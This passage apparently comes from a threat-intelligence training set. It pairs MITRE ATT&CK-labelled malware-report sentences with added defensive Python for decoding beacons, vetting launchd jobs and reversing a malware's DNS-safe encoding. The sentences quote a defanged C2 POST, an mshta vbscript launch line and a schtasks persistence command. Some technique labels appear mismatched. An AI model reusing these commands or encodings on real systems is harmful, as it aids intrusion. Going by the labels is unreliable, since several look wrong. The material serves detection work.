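# Constructed proxy log lines (not from the report): time, client IP, method, URL, status.
SAMPLE_PROXY_LOG = """\
2019-03-04T10:15:02Z 10.1.2.3 GET http://update-cdn.example/chk?6a646f652f57532d30343231 200
2019-03-04T10:15:09Z 10.1.2.4 GET http://www.example.com/chk?page=2 200
2019-03-04T10:15:11Z 10.1.2.5 GET http://cdn.example.net/static/app.js 304
2019-03-04T10:20:02Z 10.1.2.3 GET http://update-cdn.example/chk?6A646F652F57532D30343231 200
"""


def find_beacons(log_text: str) -> List[Tuple[str, str, str, str]]:
    """Scan log lines and return (client, url, user, host) for every decoded beacon."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        decoded = decode_chk_beacon(fields[3])
        if decoded:
            hits.append((fields[1], fields[3], decoded[0], decoded[1]))
    return hits


if __name__ == "__main__":
    for client, url, user, host in find_beacons(SAMPLE_PROXY_LOG):
        print(f"{client} -> {url}: user={user} host={host}")
```

The decoded pair is the useful part for triage: because the beacon carries the victim's username and hostname in the clear, a hit can be checked against the asset inventory immediately, and the same two values show which internal hosts were talking to the C2 even after the domain changes.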
|
|
{"text1":"[1]\u00a0https:\/\/www.clearskysec.com\/report-the-copykittens-are-targeting-israelis\/ [2]\u00a0https:\/\/www.clearskysec.com\/copykitten-jpost\/","labels":"['T1071']"}
|
|
{"text1":"After the C2 information has been collected, BADNEWS leverages HTTP for communication with the remote servers","labels":"['T1071']"}
|
|
{"text1":"33 Download specified file to %TEMP%\\up and execute it in a new process \u00a0 During C2 communications, BADNEWS will communicate to the C2 previously identified via HTTP","labels":"['T1071']"}
|
|
{"text1":"Exfiltrate data using HTTP over HTTP over AES over XOR, or any combination of the available transports","labels":"['T1071']"}
|
|
{"text1":"Deep Discovery Inspector protects customers from these threats via this DDI Rule: DDI Rule 18 : DNS response of a queried malware Command and Control domain DDI Rule 15 : Many unsuccessful logon attempts (nbt_scan.exe) DDI Rule 38 : Multiple unsuccessful logon attempts (nbt_scan.exe) TippingPoint customers are protected from these threats via these ThreatDV filters: 27218: HTTP: TROJ_RATANKBA_A Checkin 28219: HTTP: TROJ_RATANKBA_A Checkin 02 27220: HTTPS: TROJ_RATANKBA_A Checkin 27221: HTTP: Sundown EK Flash Exploit (SWF_EXPLOYT.YYRQ) A list of related Indicators of Compromise (IoCs) can be found in this appendix","labels":"['T1071']"}
|
|
{"text1":"IcedCoffee is a fairly basic backdoor which uses WMI to collect a variety of system and user information from the system, which is then encoded with base64, encrypted with RC4 and submitted via HTTP POST to the C2 server","labels":"['T1071']"}
|
|
{"text1":"It then calls the subfunction with the argument of 2 to get the string that it will use as the HTTP POST request","labels":"['T1071']"}
|
|
{"text1":"The resulting HTTP POST request looks like the following: POST http:\/\/185.25.50[.]93\/syshelp\/kd8812u\/protocol.php HTTP\/1.1 Host: 185.25.50[.]93 Content-Type: application\/x-www-form-urlencoded Content-Length: 21 porg=44908AE0524f422d We have not seen a C2 server respond to our requests during our analysis, however, we do know how the Trojan will parse the C2\u2019s response for specific data","labels":"['T1071']"}
|
|
{"text1":"Victim Registration SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C which is the compromised website of speakupomaha[.]com","labels":"['T1071']"}
|
|
{"text1":"It uses the legitimate Naver email platform in order to communicate with the attackers via email","labels":"['T1071']"}
|
|
{"text1":"Command & Control The malware communicates with the Naver email platform in order to communicate with the operator","labels":"['T1071']"}
|
|
{"text1":"It communicates with ftp.bytehost31[.]org via FTP for command and control (C2)","labels":"['T1071']"}
|
|
{"text1":"Domains http:\/\/mdzz2019.noip[.]cn:19931 http:\/\/mdzz2019.noip[.]cn:3654\/ From my analyses, I was able to identify http:\/\/mdzz2019.noip[.]cn:19931 as its main C2 url.\u00a0 This is a dynamic DNS, meaning the actual IP changes quite frequently","labels":"['T1071']"}
|
|
{"text1":"The Trojan uses HTTP POST requests, as seen in Figure 1 to send data to the C2 server, and GET requests to receive commands from the server, as seen in Figure 2","labels":"['T1071']"}
|
|
{"text1":"Figure 1 XAgent macOS HTTP POST request Figure 2 XAgent macOS HTTP GET request The C2 URLs generated by XAgentOSX are very similar to those created by its Windows-based counterpart","labels":"['T1071']"}
|
|
{"text1":"Figure 3 Hardware ID used by XAgent to uniquely identify compromised hosts When generating the URLs within the HTTP POST and GET requests, XAgent sets one HTTP parameter using a specific data structure that contains this agent_id value","labels":"['T1071']"}
|
|
{"text1":"it operates over DNS traffic, but can also switch to encrypted channels such as HTTPS or SSL","labels":"['T1071']"}
|
|
{"text1":"HAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP","labels":"['T1071']"}
|
|
{"text1":"Persistence is maintained through a Run registry key","labels":"['T1547.001']"}
|
|
{"text1":"This marker indicates the presence of an encrypted MZ marker in the .hwp file and is decrypted by the malware and written to the Startup folder for the user: C:\\Documents and Settings\\<username>\\Start Menu\\Programs\\Startup\\viso.exe This step establishes the persistence of the malware across reboots on the endpoint Once the decrypted MZ marker is written to the Startup folder, the 2.hwp is deleted from the endpoint The malware might perform this activity for a couple of reasons: Establish persistence for itself on the endpoint Establish persistence of another component of the malware on the endpoint Update itself on endpoint after a separate updater component downloads the update from the control server The malware has limited reconnaissance and data-gathering capabilities and is not full-fledged spyware","labels":"['T1547.001']"}
|
|
{"text1":"The two variants of MPK share the same registry key that the Trojan uses to automatically run each time the system starts, specifically: [HKLM and HKCU]\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\explorer Both MPK variants include key loggers that are extremely similar in functionality in addition to having the same strings used for headers within the key log file","labels":"['T1547.001']"}
|
|
{"text1":"The RunAtLoad key will command launchd to run the daemon when the operating system starts up, while the KeepAlive key will command launchd to let the process run indefinitely","labels":"['T1547.001']"}
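The RunAtLoad and KeepAlive keys named above are the pair to look for when reviewing LaunchDaemons and LaunchAgents. The Python below is an added example, not code from the report: it parses a constructed launchd property list with the standard library and flags a job that is started at boot, restarted whenever it exits, and run from a path outside the OS and vendor locations. The plist contents, the labels and the trusted-prefix list are assumptions made for the example.

```python
import plistlib
from typing import Dict, List

# Assumed set of prefixes where OS and vendor-installed daemons normally live.
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/", "/Applications/")

# Constructed LaunchDaemon plist (not from the report): started at boot (RunAtLoad),
# restarted on exit (KeepAlive), Apple-looking label, program hidden under /Users/Shared.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.updatehelper</string>
  <key>ProgramArguments</key>
  <array>
    <string>/Users/Shared/.cache/updatehelper</string>
    <string>--daemon</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
"""

# Constructed benign job for comparison: started at load, never kept alive, OS path.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.periodic</string>
  <key>Program</key><string>/usr/sbin/periodic</string>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""


def program_path(job: dict) -> str:
    """launchd takes the executable from Program, otherwise from ProgramArguments[0]."""
    if job.get("Program"):
        return job["Program"]
    args = job.get("ProgramArguments") or []
    return args[0] if args else ""


def keep_alive_enabled(job: dict) -> bool:
    """KeepAlive is either a bool or a dict of conditions; any non-empty dict means
    launchd will restart the job under some condition."""
    value = job.get("KeepAlive", False)
    if isinstance(value, bool):
        return value
    return isinstance(value, dict) and len(value) > 0


def assess_launchd_job(plist_bytes: bytes) -> Dict[str, object]:
    """Parse one launchd plist and report the persistence-relevant findings."""
    job = plistlib.loads(plist_bytes)
    path = program_path(job)
    run_at_load = bool(job.get("RunAtLoad", False))
    keep_alive = keep_alive_enabled(job)
    untrusted = bool(path) and not path.startswith(TRUSTED_PREFIXES)
    hidden = any(part.startswith(".") for part in path.split("/"))
    findings: List[str] = []
    if run_at_load:
        findings.append("RunAtLoad: started by launchd at boot without user action")
    if keep_alive:
        findings.append("KeepAlive: launchd restarts the process whenever it exits")
    if untrusted:
        findings.append(f"program outside trusted prefixes: {path}")
    if hidden:
        findings.append("hidden (dot-prefixed) path component")
    return {
        "label": job.get("Label"),
        "program": path,
        "findings": findings,
        # Persistent, self-restarting and not an OS/vendor path: worth an analyst's look.
        "suspicious": run_at_load and keep_alive and untrusted,
    }


if __name__ == "__main__":
    for blob in (SAMPLE_PLIST, BENIGN_PLIST):
        print(assess_launchd_job(blob))
```

The path check matters as much as the two keys: RunAtLoad with KeepAlive is how legitimate daemons are written too, so on its own the pair is noise. Reading Program and ProgramArguments the way launchd does (first argument wins when Program is absent) avoids being fooled by a plist that hides the real binary behind an interpreter in the arguments.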
|
|
{"text1":"Once the user clicks on the fake Adobe Flash Player installer, it will extract\/create the following malicious payload into the Startup directory to maintain its persistence:","labels":"['T1547.001']"}
|
|
{"text1":"Register the RUN key in the registry below, so that the VBS file is executed every time the machine starts","labels":"['T1547.001']"}
|
|
{"text1":"A new registry entry is created at HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Graphics with a value of \u201cC:\\ProgramData\\Initech\\Initech.exe\u201d \/run.","labels":"['T1547.001']"}
|
|
{"text1":"When each file is encrypted, registry keys are created under HKU\\{SID}\\Software\\Microsoft\\RestartManager\\ which are used to track metadata pertaining to the file being encrypted, such as owner, sequence, session and file hash","labels":"['T1547.001']"}
|
|
{"text1":"When the .lnk file is initialized, it spawns a CMD process","labels":"['T1547.009']"}
|
|
{"text1":"We have covered recent FIN7 activity in previous public blog posts: FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings FIN7 Evolution and the Phishing LNK To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on our investigations and observations into FIN7 activity","labels":"['T1547.009']"}
|
|
{"text1":"The .zip archive attached to the email contains a Windows shortcut (.lnk) file with the Microsoft Internet Explorer logo","labels":"['T1547.009']"}
|
|
{"text1":"Clicking on the shortcut ultimately leads to Backdoor.Pirpi being downloaded and executed on the affected computer","labels":"['T1547.009']"}
|
|
{"text1":"Comnie is able to achieve persistence via a .lnk file that is stored within the victim\u2019s startup path","labels":"['T1547.009']"}
|
|
{"text1":"Additionally, in the event Kaspersky is detected, the malware will immediately run the \u2018Conime.lnk\u2019 shortcut file in a new process after it is created","labels":"['T1547.009']"}
|
|
{"text1":"This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim","labels":"['T1547.009']"}
|
|
{"text1":"In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file \u2013 two versions of the same LNK file and VBScript technique","labels":"['T1547.009']"}
|
|
{"text1":"This spawns the hidden embedded malicious LNK file in the document","labels":"['T1547.009']"}
|
|
{"text1":"Figure 3: FIN7 phishing lure persistence mechanisms Examining Attacker Shortcut Files In many cases, attacker-created LNK files can reveal valuable information about the attacker\u2019s development environment","labels":"['T1547.009']"}
|
|
{"text1":"These files can be parsed with lnk-parser to extract all contents","labels":"['T1547.009']"}
|
|
{"text1":"LNK files have been valuable during Mandiant incident response investigations as they include volume serial number, NetBIOS name, and MAC address","labels":"['T1547.009']"}
|
|
{"text1":"The LNK file is finally used to identify a third file: a ZIP file","labels":"['T1547.009']"}
|
|
{"text1":"The LNK file is moved to the startup directory","labels":"['T1547.009']"}
|
|
{"text1":"This shortcut file points to the path of the previously written \u2018Applet.cpl\u2019 file","labels":"['T1547.009']"}
|
|
{"text1":"Finally, Reaver.v1 will execute the \u2018~WUpdate.lnk\u2019 file in a new process, thus loading the recently dropped malicious CPL file","labels":"['T1547.009']"}
|
|
{"text1":"Finally, Reaver.v2 will execute the \u2018~Update.lnk\u2019 file in a new process, thus loading the recently dropped malicious CPL file","labels":"['T1547.009']"}
|
|
{"text1":"This shortcut file calls the built-in \u2018control.exe\u2019 utility to in turn load the previously dropped malicious CPL file of \u2018winhelp.cpl\u2019","labels":"['T1547.009']"}
|
|
{"text1":"The lnk files were an especially interesting development because the powershell code they contain for decoding and dropping the payload is nearly identical to that utilized by the Zebrocy threat actor a month earlier","labels":"['T1547.009']"}
|
|
{"text1":"Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence","labels":"['T1547.009']"}
|
|
{"text1":"2 Successful payload download Astaroth\u2019s initial payload is a malicious .lnk file, a common delivery method used by threat actors","labels":"['T1547.009']"}
|
|
{"text1":"Malicious .lnk files contain a link to a URL (instead of the expected local URI) to grab the next payload","labels":"['T1547.009']"}
|
|
{"text1":"In the case of Astaroth trojan, the .lnk file contains an argument into WMIC.exe to run in non-interactive mode, which forgoes opening a window that the victim could notice, to download the hardcoded url in the .lnk","labels":"['T1547.009']"}
|
|
{"text1":"Encoded Payload Decoded Payload MD5 Size Import Hash Exported Function Version aa3f303c3319b14b4829fe2faa5999c1 322164 182ee99b4f0803628c30411b1faa9992 l7MF25T96n45qOGWX 5.3.2 126067d634d94c45084cbe1d9873d895 330804 5f45532f947501cf024d84c36e3a19a1 hJvTJcdAU3mNkuvGGq7L 5.4.1 fce54b4886cac5c61eda1e7605483ca3 345812 c1942a0ca397b627019dace26eca78d8 WcuH 5.4.1 Table 2: Static characteristics of UPPERCUT Another new feature in the latest UPPERCUT sample is that the malware sends an error code in the Cookie header if it fails to receive the HTTP response from the command and control (C2) server","labels":"['T1132']"}
|
|
{"text1":"Another difference in the network traffic generated from the malware is that the encoded proxy information has been added in the URL query values during the C2 communication","labels":"['T1132']"}
|
|
{"text1":"The communication and exfiltration of data was detected in a real-world scenario using the Cybereason platform","labels":"['T1132']"}
|
|
{"text1":"The optional HTTP data with king.jpg looks like a beacon to inform the control server that the malware is ready to accept new commands: Commands received from the control server are encoded DWORDs After decoding, these DWORDs should be in the range 123459h to 123490h Malware checking to make sure a received command is in the correct range","labels":"['T1132']"}
|
|
{"text1":"If the size is 7 bytes or more, the backdoor verifies that the command and control server sent an encoded package","labels":"['T1132']"}
|
|
{"text1":"The generated buffer is encoded using the BASE64 alphabet to be sent in the POST request","labels":"['T1132']"}
|
|
{"text1":"In response to this request, the C2 server responds with a Base64-encoded RSA public key (seen in Figure 12)","labels":"['T1132']"}
|
|
{"text1":"Data that is sent is compressed and then base64-encoded before being included in the requests","labels":"['T1132']"}
|
|
{"text1":"The C2 server sends back Base64 encoded response","labels":"['T1132']"}
|
|
{"text1":"The script gathers system specific data, such as the domain the system belongs to and the current username, that it constructs in the following format: \u00a0 <domain>\\<username>:pass \u00a0 The above string is encoded using a custom base64 encoder to strip out non-alphanumeric characters (=, \/ and +) from the data and replaces them with domain safe values (01, 02 and 03 respectively)","labels":"['T1132']"}
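The custom encoder described above, worked through as an added example (not the report's or the malware's code): base64 the `<domain>\<username>:pass` string, then replace the three non-alphanumeric base64 characters with 01, 02 and 03 so the result fits in a DNS label. The decoder is a straightforward inversion written for the example; the report does not describe the server side. The example also shows why that inversion is lossy: standard base64 output can contain those digit pairs on its own. The sample victim string is constructed.

```python
import base64
import re
from typing import Dict

# Substitutions from the record above: the three characters of standard base64 that
# are not letters or digits are replaced with digit pairs.
SUBS: Dict[str, str] = {"=": "01", "/": "02", "+": "03"}
INV: Dict[str, str] = {pair: ch for ch, pair in SUBS.items()}

# Constructed sample of the <domain>\<username>:pass string the record describes.
SAMPLE_VICTIM = "CORP\\jdoe:pass".encode("ascii")


def domain_safe_b64(data: bytes) -> str:
    """Standard base64, then '=' -> '01', '/' -> '02', '+' -> '03'."""
    text = base64.b64encode(data).decode("ascii")
    return "".join(SUBS.get(ch, ch) for ch in text)


def domain_safe_b64_decode(text: str) -> bytes:
    """Straightforward inversion (assumed; the report does not describe the server side):
    scan left to right and turn a '01'/'02'/'03' pair back into the original character."""
    out = []
    i = 0
    while i < len(text):
        pair = text[i:i + 2]
        if pair in INV:
            out.append(INV[pair])
            i += 2
        else:
            out.append(text[i])
            i += 1
    return base64.b64decode("".join(out))


def is_label_safe(text: str) -> bool:
    """True when the string fits in one DNS label: letters, digits, hyphen, 63 chars max."""
    return re.fullmatch(r"[A-Za-z0-9-]{1,63}", text) is not None


def roundtrips(data: bytes) -> bool:
    """Does encode-then-decode give the input back? Not always: base64 output can
    itself contain '01', '02' or '03', which the decoder cannot tell apart from a
    substituted '=', '/' or '+'."""
    try:
        return domain_safe_b64_decode(domain_safe_b64(data)) == data
    except ValueError:  # binascii.Error is a ValueError
        return False


if __name__ == "__main__":
    encoded = domain_safe_b64(SAMPLE_VICTIM)
    print(encoded, "label-safe:", is_label_safe(encoded), "roundtrips:", roundtrips(SAMPLE_VICTIM))
    # base64 of these three bytes is "01AA": the leading "01" is genuine data, not padding.
    print(domain_safe_b64(b"\xd3\x50\x00"), "roundtrips:", roundtrips(b"\xd3\x50\x00"))
```

The ambiguity is not just academic: a decoder on the C2 side that blindly replaces 01/02/03 will corrupt any victim string whose base64 happens to contain a zero followed by 1, 2 or 3. For a defender writing a decoder for captured queries it means trying both interpretations when the naive one fails to decode, and it is one reason real implementations usually pick a base32 or modified-base64 alphabet instead of post-hoc substitution.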
|
|
{"text1":"A notable characteristic of CopyKittens is the use of DNS for command and control communication (C&C) and for data exfiltration","labels":"['T1132']"}
|
|
{"text1":"Note: CTU researchers frequently observe threat actors renaming archiving tools and storing data for exfiltration in uncommon directories","labels":"['T1132']"}
|
|
{"text1":"Once the host-based enumeration information was obtained, it was base64-encoded and then appended to the URL post request to a C2, whereas in previous versions this information was written to a text file.","labels":"['T1132']"}
|
|
{"text1":"The actor has used several notable techniques in these incidents such as sniffing passwords from Wi-Fi traffic, poisoning the NetBIOS Name Service, and spreading laterally via the EternalBlue exploit.\u00a0 APT28 Uses Malicious Document to Target Hospitality Industry FireEye has uncovered a malicious document sent in spear phishing emails to multiple companies in the hospitality industry, including hotels in at least seven European countries and one Middle Eastern country in early July","labels":"['T1598.002']"}
|
|
{"text1":"Malware Delivery Method In all emails sent to these government officials, the actor used the same attachment: a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload","labels":"['T1598.002']"}
|
|
{"text1":"Figure 1: Contents of the Email A review of the email header data from the spear phishing messages showed that the threat actors sent the emails using the same infrastructure they have used in the past","labels":"['T1598.002']"}
|
|
{"text1":"In at least some of these recent attacks, Buckeye used spear-phishing emails with a malicious .zip attachment","labels":"['T1598.002']"}
|
|
{"text1":"Looking at earlier attacks between 2013 and 2016, we believe Comnie was also used in targeted attacks against the following individuals or organizations: Taiwan government IT service vendor in Asia Journalist of a Tibetan radio station Figure 6 Email sent to Journalist of Tibetan radio station \u00a0 Malicious Macros The malicious macro documents used to deliver Comnie initially hide the content inside and requests that the user enables macros prior to viewing the document","labels":"['T1598.002']"}
|
|
{"text1":"APT32 actors continue to deliver the malicious attachments via spear-phishing emails","labels":"['T1598.002']"}
|
|
{"text1":"The credential harvesting attacks used spear-phishing emails that contained malicious Microsoft Office documents that leveraged the \u201cattachedTemplate\u201d technique to load a template from a remote server","labels":"['T1598.002']"}
|
|
{"text1":"The attack involved a spear-phishing email with a subject of \u201cProject Offer\u201d and a malicious Word document (SHA256: d393349a4ad00902e3d415b622cf27987a0170a786ca3a1f991a521bff645318) as an attachment","labels":"['T1598.002']"}
|
|
{"text1":"Phishing emails with political themes were used in the majority of the observed attack emails","labels":"['T1598.002']"}
|
|
{"text1":"Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails containing a malicious Microsoft Word document","labels":"['T1598.002']"}
|
|
{"text1":"Figure 2: Excerpt of an APT33 malicious .hta file We assess APT33 used a built-in phishing module within the publicly available ALFA TEaM Shell (aka ALFASHELL) to send hundreds of spear phishing emails to targeted individuals in 2016","labels":"['T1598.002']"}
|
|
{"text1":"The spear phishing emails and attached malicious macro documents typically have geopolitical themes","labels":"['T1598.002']"}
|
|
{"text1":"The attackers used spear phishing emails combined with malicious HWP documents created using Hancom Hangul Office Suite","labels":"['T1598.002']"}
|
|
{"text1":"We suspect the attacker was trying to generate sympathy by reminding the reader that Munchon and the province it is in, Kangwon, were part of a unified province that included South Korea's Gangwon-do prior to the division of Korea in 1945. A second email contained a story about a person called 'Ewing Kim' who was looking for help: The email's attachments are two different HWP documents, both leveraging the same vulnerability (CVE-2013-0808)","labels":"['T1598.002']"}
|
|
{"text1":"This campaign began with a handful of spear phishing emails to South Korean targets and containing malicious attachments","labels":"['T1598.002']"}
|
|
{"text1":"Another interesting characteristic of the malicious documents is that the metadata associated with the document files themselves also matches that found in many of the malicious documents that were previously being used to spread Remcos. Figure 3: Document metadata. Additionally, the creation and modification dates associated with these documents are shortly after we released a detailed analysis of Remcos distribution campaigns that were being observed throughout 2018","labels":"['T1598.002']"}
|
|
{"text1":"In May 2016, we\u00a0published\u00a0a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware","labels":"['T1598.002']"}
|
|
{"text1":"Analysis APT34 sent a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as an attachment in a malicious spear phishing email sent to the victim organization","labels":"['T1598.002']"}
|
|
{"text1":"This attack diverged from previous attacks we observed from this group as it involved spear-phishing emails sent to targeted organizations with password protected RAR archive attachments that contained malicious Excel Web Query files (.iqy)","labels":"['T1598.002']"}
|
|
{"text1":"In this instance a spear phishing email was used containing a lure designed to socially engineer and entice the victim to executing a malicious attachment","labels":"['T1598.002']"}
|
|
{"text1":"In contrast to the two samples used in these attacks, this one did not use a PE attachment, and instead used a Microsoft Word document containing a malicious macro as the delivery vehicle","labels":"['T1598.002']"}
|
|
{"text1":"The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars","labels":"['T1598.002']"}
|
|
{"text1":"Zebrocy is delivered primarily via phishing attacks that contain malicious Microsoft Office documents with macros as well as simple executable file attachments","labels":"['T1598.002']"}
|
|
{"text1":"Malicious Document Decoy Document The attack starts with a spear-phishing email containing the HWP document named \"\ubbf8\ubd81 \uc815\uc0c1\ud68c\ub2f4 \uc804\ub9dd \ubc0f \ub300\ube44.hwp\" (Prospects for US-North Korea Summit .hwp)","labels":"['T1598.002']"}
|
|
{"text1":"Delivery TG-3390 conducts SWCs or sends spearphishing emails with ZIP archive attachments","labels":"['T1598.002']"}
|
|
{"text1":"The case we found arrived through a targeted email that contained a document file (in docx format).","labels":"['T1598.002']"}
|
|
{"text1":"APT32 likely used COVID-19-themed malicious attachments against Chinese speaking targets.","labels":"['T1598.002']"}
|
|
{"text1":"Once the password (delivered in the body of the email) is entered, the users are presented with a document that will request users to enable the malicious macro, as shown in Figure 3","labels":"['T1204']"}
|
|
{"text1":"Successful execution of the macro within the malicious document results in the installation of APT28\u2019s signature GAMEFISH malware","labels":"['T1204']"}
|
|
{"text1":"Once the user enables macros, the macro will perform the following actions: Displays decoy content Checks for the existence of a file at %APPDATA%\\wscript.exe If %APPDATA%\\wscript.exe does not exist, the macro converts an embedded hex-encoded string into bytes and saves this data to the %APPDATA%\\wscript.exe","labels":"['T1204']"}
|
|
{"text1":"None of the known documents contain a lure image or message to instruct the recipient to click the Enable Content button necessary to run the macro, as seen in Figure 1","labels":"['T1204']"}
|
|
{"text1":"Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents The malicious LNK launches \u201cmshta.exe\u201d with the following arguments passed to it: vbscript:Execute(\"On Error Resume Next:set w=GetObject(,\"\"Word.Application\"\"):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close\") The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2","labels":"['T1204']"}
|
|
{"text1":"Malicious processes are marked red (click image to enlarge): The following malicious files are dropped and run: C:\\ProgramData\\{2ED05C38-D464-4188-BC7F-F6915DE8D764}\\OFFLINE\\9A189DFE\\C7B7C186\\main.vbs dcac79d7dc4365c6d742a49244e81fd0 C:\\Users\\Public\\Libraries\\RecordedTV\\DnE.ps1 7fe0cb5edc11861bc4313a6b04aeedb2 C:\\Users\\Public\\Libraries\\RecordedTV\\DnS.ps1 3920c11797ed7d489ca2a40201c66dd4 \u201cC:\\Windows\\System32\\schtasks.exe\u201d \/create \/F \/sc minute \/mo 3 \/tn \u201cGoogleUpdateTasksMachineUI\u201d \/tr C:\\Users\\Public\\Libraries\\RecordedTV\\backup.vbs 7528c387f853d96420cf7e20f2ad1d32 Command and control server is located in the following domain: tecsupport[.]in A detailed analysis of the malware is provided in two\u00a0posts by Palo Alto networks and in a post\u00a0by FireEye, which\u00a0wrote about previous campaigns by this threat agent","labels":"['T1204']"}
|
|
{"text1":"This document was a decoy aimed to entice the user to open malicious documents embedded further down the page. The actor embedded two additional links and the document urged the user to click on these links for more information about New Year's activities in North Korea","labels":"['T1204']"}
|
|
{"text1":"Email attacks often use \u201cclick-worthy\u201d or interesting topics to convince users to click links or open attachments that could lead to various threats","labels":"['T1204']"}
|
|
{"text1":"Users are advised to avoid opening attachments and click links on unsolicited emails","labels":"['T1204']"}
|
|
{"text1":"These Honeybee documents did not contain any specific lures, rather variations of a \u201cnot compatible\u201d message attempting to convince the user to enable content","labels":"['T1204']"}
|
|
{"text1":"Additionally, a small number of campaigns over this same period also made use of various file-sharing platforms like Dropbox for hosting the malicious documents rather than directly attaching them to the messages themselves. Figure 2: Example malicious Excel document. Similar to the technique described in our previous blog about Remcos, the contents of the documents have been intentionally made to appear as if they are blurry, with the user being prompted to enable editing to have a clearer view of the contents","labels":"['T1204']"}
|
|
{"text1":"By default, Excel does not allow the download of data from the remote server, but will ask for the user\u2019s consent by presenting the dialog box in Figure 2: Figure 2 Excel security notice for .iqy files By enabling this data connection, the user allows Excel to obtain content from the URL in the .iqy file","labels":"['T1204']"}
|
|
{"text1":"The document also contained a lure image, similar to ones commonly found in malicious macro documents which ask the user to click on \u201cEnable Content\u201d as seen in Figure 2","labels":"['T1204']"}
|
|
{"text1":"Message 3: Headers Received: by mailcenter.support Sender Mercator Institute for China Studies <publications@mericcs.org> Subject Authoritarian advance Responding to Chinas growing political influence in Europe Body Content and images included within the e-mail body were a direct copy of the following MERICS report: https:\/\/www.merics.org\/sites\/default\/files\/2018-02\/GPPi_MERICS_Authoritarian_Advance_2018_1.pdf Notes The hyperlinked text Click here to download the report within the e-mail body led to a malicious RTF document located at the URL hxxp:\/\/www.mericcs.org\/GPPi_MERICS_Authoritarian_Advance_2018_1Q.doc","labels":"['T1204']"}
|
|
{"text1":"By doing so, the main content of the macro itself (Figure 2) can be kept relatively simple, and the malicious code\u2019s small footprint can help enable evasion of automated detection mechanisms based on macro content","labels":"['T1204']"}
|
|
{"text1":"In March, we came across an email with a malware attachment that used the Gamaredon group\u2019s tactics.","labels":"['T1204']"}
|
|
{"text1":"Once a user has double-clicked the embedded image, the form executes a VB setup script","labels":"['T1204']"}
|
|
{"text1":"The threat actors also took additional steps to replace some variable strings in the more recent samples, likely in an attempt to avoid signature-based detection from Yara rules. Once the document was opened, it prompted the user to enable the macro titled \"BlackWater.bas\".","labels":"['T1204']"}
|
|
{"text1":"The version used here is version 4.1 digitally signed by Notepad++, as shown in Figure 5","labels":"['T1553.002']"}
|
|
{"text1":"By using this technique, the malware is able to leverage itself from a signed and verified legitimate Windows OS process, or, alternatively, if aswrundll.exe or unins000.exe exists, a signed and verified security product process","labels":"['T1553.002']"}
|
|
{"text1":"FIN7 has consistently utilized legally purchased code signing certificates to sign their CARBANAK payloads","labels":"['T1553.002']"}
|
|
{"text1":"In these websites they hosted malware that was digitally signed\u00a0with a valid, likely stolen code signing certificate Based on VirusTotal uploads, malicious documents content, and known victims \u2013 other targeted organisations are located in Turkey, Qatar, Kuwait, United Arab Emirates, Saudi Arabia, and Lebanon","labels":"['T1553.002']"}
|
|
{"text1":"Digitally signed malware The entire bundle (VPN client and malware) was digitally signed with a valid code signing certificate issued by Symantec to AI Squared, a legitimate software company that develops accessibility software: Thumbprint: F340C0D841F9D99DBC289151C13391000366631C Serial number: 45 E4 7F 56 0B 01 B6 4E 68 39 5E 5D 79 2F 2E 09 Another Helminth sample,\u00a01c23b3f11f933d98febfd5a92eb5c715, was signed with a different AI Squared code signing certificate: Thumbprint: 92B8C0872BACDC226B9CE4D783D5CCAD61C6158A Serial number:62 E0 44 E7 37 24 61 2D 79 4B 93 AF 97 46 13 48 This suggest that the attackers had got a hold of an Ai Squared signing key, potentially after compromising their network","labels":"['T1553.002']"}
|
|
{"text1":"They combine reconnaissance of GPO (Group Policy Object management for execution) with digitally-signed malware to avoid detection or blocking during their infection phases","labels":"['T1553.002']"}
|
|
{"text1":"Stolen code signing certificates used to sign malware","labels":"['T1553.002']"}
|
|
{"text1":"Many of this APT\u2019s components are signed with phony Intel and AMD digital certificates","labels":"['T1553.002']"}
|
|
{"text1":"Based upon the instructional guide and the provided tools, this package appears consistent with the methodologies FireEye outlined in their research on how these attacks were executed, including specific details such as the use of ICAP via a proxy passthrough, in this case specifically squid, and using certbot to create a Let\u2019s Encrypt SSL certificate","labels":"['T1573']"}
|
|
{"text1":"The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult","labels":"['T1573']"}
|
|
{"text1":"Encrypting communications using AES and RSA public key cryptography 5","labels":"['T1573']"}
|
|
{"text1":"Figure 12 and Figure 13 show the RSA keys used in FELIXROOT, and Figure 14 shows the AES encryption parameters","labels":"['T1573']"}
|
|
